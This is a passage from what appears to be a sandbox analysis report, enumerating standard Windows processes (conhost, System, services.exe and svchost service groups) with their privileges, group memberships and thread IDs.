[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 18 os_tid = 0x564 Thread: id = 22 os_tid = 0x860 Process: id = "8" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x11e3c000" os_pid = "0x1ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x868" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 19 os_tid = 0x2bc Thread: id = 20 os_tid = 0x3b8 Thread: id = 21 os_tid = 0xdec Process: id = "9" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 23 os_tid = 0x1084 Thread: id = 24 os_tid = 0xe8 Thread: id = 25 os_tid = 0x1c Thread: id = 26 os_tid = 0x12e4 Thread: id = 27 os_tid = 0x80 Thread: id = 28 os_tid = 0xfd8 Thread: id = 29 os_tid = 0x124 Thread: id = 30 os_tid = 0x14 Thread: id = 31 os_tid = 0x128 Thread: id = 32 os_tid = 0xebc Thread: id = 33 os_tid = 0xe58 Thread: id = 34 os_tid = 0x0 Thread: id = 35 os_tid = 0x30 Thread: id = 36 os_tid = 0x188 Thread: id = 37 os_tid = 0x100 Thread: id = 38 os_tid = 0xb18 Thread: id = 39 os_tid = 0xb14 Thread: id = 40 os_tid = 0xa8 Thread: id = 41 os_tid = 0xa64 Thread: id = 42 os_tid = 0xc4 Thread: id = 43 os_tid = 0x84 Thread: id = 44 os_tid = 0x9dc Thread: id = 45 os_tid = 0x974 Thread: id = 46 os_tid = 0x8d0 Thread: id = 47 os_tid = 0x8b0 Thread: id = 48 os_tid = 0x848 Thread: id = 49 os_tid = 0x844 Thread: id = 50 os_tid = 0x82c Thread: id = 51 os_tid = 0x4d8 Thread: id = 52 os_tid = 0x10 Thread: id = 53 os_tid = 0x664 Thread: id = 54 os_tid = 0x644 Thread: id = 55 os_tid = 0x64 Thread: id = 56 os_tid = 0x5e0 Thread: id = 57 os_tid = 0x34 Thread: id = 58 os_tid = 0x4a4 Thread: id = 59 os_tid = 0x49c Thread: id = 60 os_tid = 0x40 Thread: id = 61 os_tid = 0x1b8 Thread: id = 62 os_tid = 0x6c Thread: id = 63 os_tid = 0xb0 Thread: id = 64 os_tid = 0x364 Thread: id = 65 os_tid = 0x2c Thread: id = 66 os_tid = 0x1b4 Thread: id = 67 os_tid = 0x8c Thread: id = 68 os_tid = 0x2f8 Thread: id = 69 os_tid = 0x68 Thread: id = 70 os_tid = 0x174 Thread: id = 71 os_tid = 0xfc Thread: id = 72 os_tid = 0x60 Thread: id = 73 os_tid = 0x164 Thread: id = 74 os_tid = 0x70 Thread: id = 75 os_tid = 0x74 Thread: id = 76 os_tid = 0x1f8 Thread: id = 77 os_tid = 0x13c Thread: id = 78 os_tid = 0x1bc Thread: id = 79 os_tid = 0x1b0 Thread: id = 80 os_tid = 0x1ac Thread: id = 81 os_tid = 0x1a8 Thread: id = 82 os_tid = 0x28 Thread: id = 83 os_tid = 0x130 Thread: id = 84 os_tid = 0xe4 Thread: id = 85 os_tid = 0x20 Thread: id = 86 os_tid = 0x54 Thread: id = 87 os_tid = 0xbc Thread: id = 88 os_tid = 0x180 Thread: id = 89 os_tid = 0xc8 Thread: id = 90 os_tid = 0xa4 Thread: id = 91 os_tid = 0x50 Thread: id = 92 os_tid = 0x11c Thread: id = 93 os_tid = 0x120 Thread: id = 94 os_tid = 0x15c Thread: id = 95 os_tid = 0x14c Thread: id = 96 os_tid = 0xb8 Thread: id = 97 os_tid = 0x148 Thread: id = 98 os_tid = 0x88 Thread: id = 99 os_tid = 0xb4 Thread: id = 100 os_tid = 0xec Thread: id = 101 os_tid = 0x8 Thread: id = 102 os_tid = 0xf0 Thread: id = 501 os_tid = 0x18 Thread: id = 512 os_tid = 0x1374 Thread: id = 551 os_tid = 0x4c Process: id = "10" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x56669000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0x1dc" cmd_line = "C:\\WINDOWS\\system32\\services.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 103 os_tid = 0x86c Thread: id = 104 os_tid = 0x854 Thread: id = 105 os_tid = 0x12c Thread: id = 106 os_tid = 0x3ec Thread: id = 107 os_tid = 0x3e8 Thread: id = 108 os_tid = 0x3e4 Thread: id = 109 os_tid = 0x3d4 Thread: id = 110 os_tid = 0x3d0 Thread: id = 111 os_tid = 0x3bc Thread: id = 112 os_tid = 0x328 Thread: id = 113 os_tid = 0x2fc Thread: id = 114 os_tid = 0x298 Thread: id = 115 os_tid = 0x294 Thread: id = 491 os_tid = 0xf24 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75ed0000" os_pid = "0x2a4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:00004ed0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 116 os_tid = 0xb0c Thread: id = 117 os_tid = 0xa9c Thread: id = 118 os_tid = 0x9b4 Thread: id = 119 os_tid = 0x9a4 Thread: id = 120 os_tid = 0x99c Thread: id = 121 os_tid = 0x964 Thread: id = 122 os_tid = 0x960 Thread: id = 123 os_tid = 0x954 Thread: id = 124 os_tid = 0x948 Thread: id = 125 os_tid = 0x92c Thread: id = 126 os_tid = 0x918 Thread: id = 127 os_tid = 0x90c Thread: id = 128 os_tid = 0x75c Thread: id = 129 os_tid = 0x758 Thread: id = 130 os_tid = 0x638 Thread: id = 131 os_tid = 0x62c Thread: id = 132 os_tid = 0x40c Thread: id = 133 os_tid = 0x314 Thread: id = 134 os_tid = 0x2ec Thread: id = 135 os_tid = 0x3b4 Thread: id = 136 os_tid = 0x358 Thread: id = 137 os_tid = 0x354 Thread: id = 138 os_tid = 0x340 Thread: id = 139 os_tid = 0x32c Thread: id = 140 os_tid = 0x31c Thread: id = 141 os_tid = 0x30c Thread: id = 142 os_tid = 0x2f4 Thread: id = 143 os_tid = 0x2a8 Thread: id = 581 os_tid = 0x11bc Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74d18000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:00008d78" [0xc000000f], "LOCAL" [0x7] Thread: id = 144 os_tid = 0x9ac Thread: id = 145 os_tid = 0x9a8 Thread: id = 146 os_tid = 0x950 Thread: id = 147 os_tid = 0x94c Thread: id = 148 os_tid = 0x93c Thread: id = 149 os_tid = 0x938 Thread: id = 150 os_tid = 0x934 Thread: id = 151 os_tid = 0x928 Thread: id = 152 os_tid = 0x924 Thread: id = 153 os_tid = 0x91c Thread: id = 154 os_tid = 0x640 Thread: id = 155 os_tid = 0x63c Thread: id = 156 os_tid = 0x630 Thread: id = 157 os_tid = 0x628 Thread: id = 158 os_tid = 0x3c8 Thread: id = 159 os_tid = 0x344 Thread: id = 160 os_tid = 0x338 Thread: id = 161 os_tid = 0x334 Thread: id = 162 os_tid = 0x324 Thread: id = 163 os_tid = 0x320 Thread: id = 164 os_tid = 0x318 Thread: id = 165 os_tid = 0x308 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 166 os_tid = 0xecc Thread: id = 167 os_tid = 0xe94 Thread: id = 168 os_tid = 0xe9c Thread: id = 169 os_tid = 0xbec Thread: id = 170 os_tid = 0xb50 Thread: id = 171 os_tid = 0xf7c Thread: id = 172 os_tid = 0xf98 Thread: id = 173 os_tid = 0xa70 Thread: id = 174 os_tid = 0x6dc Thread: id = 175 os_tid = 0x1068 Thread: id = 176 os_tid = 0x11ac Thread: id = 177 os_tid = 0x1144 Thread: id = 178 os_tid = 0x133c Thread: id = 179 os_tid = 0x1334 Thread: id = 180 os_tid = 0x1330 Thread: id = 181 os_tid = 0x132c Thread: id = 182 os_tid = 0x1328 Thread: id = 183 os_tid = 0x1324 Thread: id = 184 os_tid = 0x1304 Thread: id = 185 os_tid = 0x12fc Thread: id = 186 os_tid = 0x12f4 Thread: id = 187 os_tid = 0x12e0 Thread: id = 188 os_tid = 0x12dc Thread: id = 189 os_tid = 0x1270 Thread: id = 190 os_tid = 0x11f4 Thread: id = 191 os_tid = 0x1120 Thread: id = 192 os_tid = 0x111c Thread: id = 193 os_tid = 0x1118 Thread: id = 194 os_tid = 0x1110 Thread: id = 195 os_tid = 0x1100 Thread: id = 196 os_tid = 0x110c Thread: id = 197 os_tid = 0x1108 Thread: id = 198 os_tid = 0x10a4 Thread: id = 199 os_tid = 0x10a0 Thread: id = 200 os_tid = 0x109c Thread: id = 201 os_tid = 0x1094 Thread: id = 202 os_tid = 0x1088 Thread: id = 203 os_tid = 0xf1c Thread: id = 204 os_tid = 0xaa0 Thread: id = 205 os_tid = 0xa30 Thread: id = 206 os_tid = 0xa14 Thread: id = 207 os_tid = 0xa0c Thread: id = 208 os_tid = 0x9e8 Thread: id = 209 os_tid = 0x9e0 Thread: id = 210 os_tid = 0x9d8 Thread: id = 211 os_tid = 0x9cc Thread: id = 212 os_tid = 0x9c4 Thread: id = 213 os_tid = 0x9b8 Thread: id = 214 os_tid = 0x9b0 Thread: id = 215 os_tid = 0x9a0 Thread: id = 216 os_tid = 0x998 Thread: id = 217 os_tid = 0x984 Thread: id = 218 os_tid = 0x978 Thread: id = 219 os_tid = 0x968 Thread: id = 220 os_tid = 0x95c Thread: id = 221 os_tid = 0x958 Thread: id = 222 os_tid = 0x944 Thread: id = 223 os_tid = 0x930 Thread: id = 224 os_tid = 0x914 Thread: id = 225 os_tid = 0x8ac Thread: id = 226 os_tid = 0x840 Thread: id = 227 os_tid = 0x83c Thread: id = 228 os_tid = 0x430 Thread: id = 229 os_tid = 0x7c0 Thread: id = 230 os_tid = 0x7bc Thread: id = 231 os_tid = 0x7ac Thread: id = 232 os_tid = 0x784 Thread: id = 233 os_tid = 0x780 Thread: id = 234 os_tid = 0x77c Thread: id = 235 os_tid = 0x6fc Thread: id = 236 os_tid = 0x678 Thread: id = 237 os_tid = 0x670 Thread: id = 238 os_tid = 0x660 Thread: id = 239 os_tid = 0x654 Thread: id = 240 os_tid = 0x61c Thread: id = 241 os_tid = 0x5d0 Thread: id = 242 os_tid = 0x5a0 Thread: id = 243 os_tid = 0x4ac Thread: id = 244 os_tid = 0x41c Thread: id = 245 os_tid = 0x414 Thread: id = 246 os_tid = 0x404 Thread: id = 247 os_tid = 0x158 Thread: id = 248 os_tid = 0x39c Thread: id = 249 os_tid = 0x2e8 Thread: id = 250 os_tid = 0x180 Thread: id = 251 os_tid = 0x234 Thread: id = 252 os_tid = 0x26c Thread: id = 253 os_tid = 0x2a0 Thread: id = 254 os_tid = 0x170 Thread: id = 255 os_tid = 0x1a8 Thread: id = 256 os_tid = 0x16c Thread: id = 257 os_tid = 0x3b0 Thread: id = 493 os_tid = 0xf28 Thread: id = 494 os_tid = 0xdb0 Thread: id = 499 os_tid = 0x4e8 Thread: id = 500 os_tid = 0xcd4 Thread: id = 502 os_tid = 0x7b0 Thread: id = 503 os_tid = 0xd50 Thread: id = 504 os_tid = 0xd7c Thread: id = 505 os_tid = 0xda0 Thread: id = 506 os_tid = 0xdc0 Thread: id = 507 os_tid = 0x1fc Thread: id = 523 os_tid = 0x1180 Thread: id = 525 os_tid = 0x13b4 Thread: id = 526 os_tid = 0xf78 Thread: id = 527 os_tid = 0xf80 Thread: id = 528 os_tid = 0x1020 Thread: id = 529 os_tid = 0x1034 Thread: id = 596 os_tid = 0x824 Thread: id = 600 os_tid = 0xf4 Thread: id = 601 os_tid = 0xeec Thread: id = 602 os_tid = 0x11b0 Thread: id = 603 os_tid = 0xf48 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74331000" os_pid = "0x3c0" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xa], "NT SERVICE\\CoreMessagingRegistrar" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f63" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 258 os_tid = 0xa60 Thread: id = 259 os_tid = 0xa5c Thread: id = 260 os_tid = 0xa58 Thread: id = 261 os_tid = 0xa34 Thread: id = 262 os_tid = 0xa1c Thread: id = 263 os_tid = 0xa18 Thread: id = 264 os_tid = 0x9f8 Thread: id = 265 os_tid = 0x8ec Thread: id = 266 os_tid = 0x8e8 Thread: id = 267 os_tid = 0x87c Thread: id = 268 os_tid = 0x870 Thread: id = 269 os_tid = 0x838 Thread: id = 270 os_tid = 0x834 Thread: id = 271 os_tid = 0x814 Thread: id = 272 os_tid = 0x7a8 Thread: id = 273 os_tid = 0x78c Thread: id = 274 os_tid = 0x7e0 Thread: id = 275 os_tid = 0x7f4 Thread: id = 276 os_tid = 0x694 Thread: id = 277 os_tid = 0x7d4 Thread: id = 278 os_tid = 0x7cc Thread: id = 279 os_tid = 0x7c8 Thread: id = 280 os_tid = 0x7c4 Thread: id = 281 os_tid = 0x65c Thread: id = 282 os_tid = 0x15c Thread: id = 283 os_tid = 0x3c4 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x738d0000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 284 os_tid = 0xd04 Thread: id = 285 os_tid = 0xd20 Thread: id = 286 os_tid = 0x1250 Thread: id = 287 os_tid = 0x1314 Thread: id = 288 os_tid = 0x125c Thread: id = 289 os_tid = 0xf20 Thread: id = 290 os_tid = 0x1380 Thread: id = 291 os_tid = 0x4f8 Thread: id = 292 os_tid = 0x4ec Thread: id = 293 os_tid = 0xf2c Thread: id = 294 os_tid = 0xef4 Thread: id = 295 os_tid = 0x54c Thread: id = 296 os_tid = 0x444 Thread: id = 297 os_tid = 0x418 Thread: id = 298 os_tid = 0x410 Thread: id = 299 os_tid = 0x35c Thread: id = 300 os_tid = 0x3f4 Thread: id = 301 os_tid = 0x3f0 Thread: id = 302 os_tid = 0x33c Thread: id = 303 os_tid = 0x238 Thread: id = 304 os_tid = 0x154 Thread: id = 305 os_tid = 0x3dc Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x735ee000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\HvHost" [0xa], "S-1-5-80-2355113075-3359631449-3346493237-3667020425-1655874352" [0xa], "NT SERVICE\\irmon" [0xa], "NT SERVICE\\NcbService" [0xe], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\NgcSvc" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a4e4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 306 os_tid = 0xe60 Thread: id = 307 os_tid = 0xe5c Thread: id = 308 os_tid = 0x898 Thread: id = 309 os_tid = 0x894 Thread: id = 310 os_tid = 0x890 Thread: id = 311 os_tid = 0x88c Thread: id = 312 os_tid = 0x878 Thread: id = 313 os_tid = 0x5ac Thread: id = 314 os_tid = 0x548 Thread: id = 315 os_tid = 0x540 Thread: id = 316 os_tid = 0x4e0 Thread: id = 317 os_tid = 0x4bc Thread: id = 318 os_tid = 0x290 Thread: id = 319 os_tid = 0x164 Thread: id = 320 os_tid = 0x3fc Thread: id = 595 os_tid = 0x728 Thread: id = 598 os_tid = 0xe84 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x566ab000" os_pid = "0x350" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xe], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "S-1-5-80-2226967063-754826275-1661302337-2802353169-2369347280" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "S-1-5-80-3916113136-2435487254-2535488001-4050622930-2364918814" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b10d" [0xc000000f], "LOCAL" [0x7] Thread: id = 321 os_tid = 0xcbc Thread: id = 322 os_tid = 0xc24 Thread: id = 323 os_tid = 0xc10 Thread: id = 324 os_tid = 0xc0c Thread: id = 325 os_tid = 0xc08 Thread: id = 326 os_tid = 0xc04 Thread: id = 327 os_tid = 0xbd0 Thread: id = 328 os_tid = 0x9dc Thread: id = 329 os_tid = 0x544 Thread: id = 330 os_tid = 0x6f4 Thread: id = 331 os_tid = 0xbcc Thread: id = 332 os_tid = 0x4dc Thread: id = 333 os_tid = 0x490 Thread: id = 334 os_tid = 0x4c4 Thread: id = 335 os_tid = 0x9d4 Thread: id = 336 os_tid = 0x8f4 Thread: id = 337 os_tid = 0x700 Thread: id = 338 os_tid = 0x538 Thread: id = 339 os_tid = 0x534 Thread: id = 340 os_tid = 0x530 Thread: id = 341 os_tid = 0x500 Thread: id = 342 os_tid = 0x4b8 Thread: id = 343 os_tid = 0x498 Thread: id = 344 os_tid = 0x47c Thread: id = 345 os_tid = 0x478 Thread: id = 346 os_tid = 0x474 Thread: id = 347 os_tid = 0x470 Thread: id = 348 os_tid = 0x46c Thread: id = 349 os_tid = 0x468 Thread: id = 350 os_tid = 0x448 Thread: id = 351 os_tid = 0x424 Thread: id = 352 os_tid = 0x420 Thread: id = 353 os_tid = 0x364 Thread: id = 518 os_tid = 0x1244 Thread: id = 519 os_tid = 0xf94 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x667bb000" os_pid = "0x434" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k NetworkService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xa], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xe], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd29" [0xc000000f], "LOCAL" [0x7] Thread: id = 354 os_tid = 0x484 Thread: id = 355 os_tid = 0x136c Thread: id = 356 os_tid = 0x1154 Thread: id = 357 os_tid = 0x114c Thread: id = 358 os_tid = 0x10f8 Thread: id = 359 os_tid = 0xd18 Thread: id = 360 os_tid = 0xa20 Thread: id = 361 os_tid = 0xf04 Thread: id = 362 os_tid = 0x6b8 Thread: id = 363 os_tid = 0x864 Thread: id = 364 os_tid = 0x674 Thread: id = 365 os_tid = 0x658 Thread: id = 366 os_tid = 0x4d4 Thread: id = 367 os_tid = 0x4d0 Thread: id = 368 os_tid = 0x4cc Thread: id = 369 os_tid = 0x4c8 Thread: id = 370 os_tid = 0x4c0 Thread: id = 371 os_tid = 0x494 Thread: id = 372 os_tid = 0x48c Thread: id = 373 os_tid = 0x488 Thread: id = 374 os_tid = 0x464 Thread: id = 375 os_tid = 0x45c Thread: id = 376 os_tid = 0x458 Thread: id = 377 os_tid = 0x454 Thread: id = 378 os_tid = 0x450 Thread: id = 379 os_tid = 0x438 Thread: id = 496 os_tid = 0xf54 Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x57af0000" os_pid = "0x554" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = 